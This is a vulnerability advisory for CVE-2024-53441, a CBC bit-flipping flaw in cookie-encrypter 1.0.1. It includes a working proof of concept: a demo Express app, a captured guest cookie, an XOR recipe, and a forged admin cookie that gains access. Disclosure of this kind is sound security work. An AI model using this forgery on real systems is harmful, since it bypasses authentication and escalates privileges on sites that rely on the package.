# CVE-2024-53441 ## Description: An issue in the index.js decryptCookie function of cookie-encrypter v1.0.1 allows attackers to execute a bit flipping attack. | Field | Details | |----------------------------|--------------------------------------------------------| | Vulnerability type | Auth bypass using cookie | | Vendor of Product | NPM | | Affected Product Code Base | https://www.npmjs.com/package/cookie-encrypter - 1.0.1 | | Affected Component | index.js decryptCookie function | | Attack Type | Remote | | Impact | Escalation of Privileges | |Discoverer|Mathys REBOUX| ## Attack Vectors: To exploit the vulnerability, someone must craft a new cookie using a bit flipping attack (AES CBC is used). The cookie IV part (the first part) must be xored by a stream and it'll XOR the decrypted cookie too by the same stream. # Demo of the attack: Let's imagine a website with the following source code: ```js const express = require('express'); const cookieParser = require('cookie-parser'); const cookieEncrypter = require('cookie-encrypter'); const app = express(); app.use(cookieParser("NicePasswordHereItIsAGoodSecret!")); app.use(cookieEncrypter("NicePasswordHereItIsAGoodSecret!")); app.get('/login', function(req, res) { res.cookie("role","guest") res.send("logged in as guest") }) app.get("/admin",(req,res)=>{ console.log(req.cookies) if(req.cookies.role=="admin"){ res.send("Access granted.") }else{ res.send("Access denied.") } }) app.listen(80) ``` We load /login and get a cookie as guest: ``` e:87c3aa62cf38214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1 ``` We now have to XOR the IV: 87c3aa62cf38214f7c25d66eacb4c95a We XOR it by guest and by admin to do the bit flip attack, [here is a link to help](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Hex','string':'67756573740000000000000000000000'%7D,'Standard',false)XOR(%7B'option':'Hex','string':'61646d696e0000000000000000000000'%7D,'Standard',false)To_Hex('None',0)&input=ODdjM2FhNjJjZjM4MjE0ZjdjMjVkNjZlYWNiNGM5NWE) So we get the following crafted cookie: ``` e:81d2a278d538214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1 ``` And now loading /admin we get: Access granted. ## Discoverer: Mathys REBOUX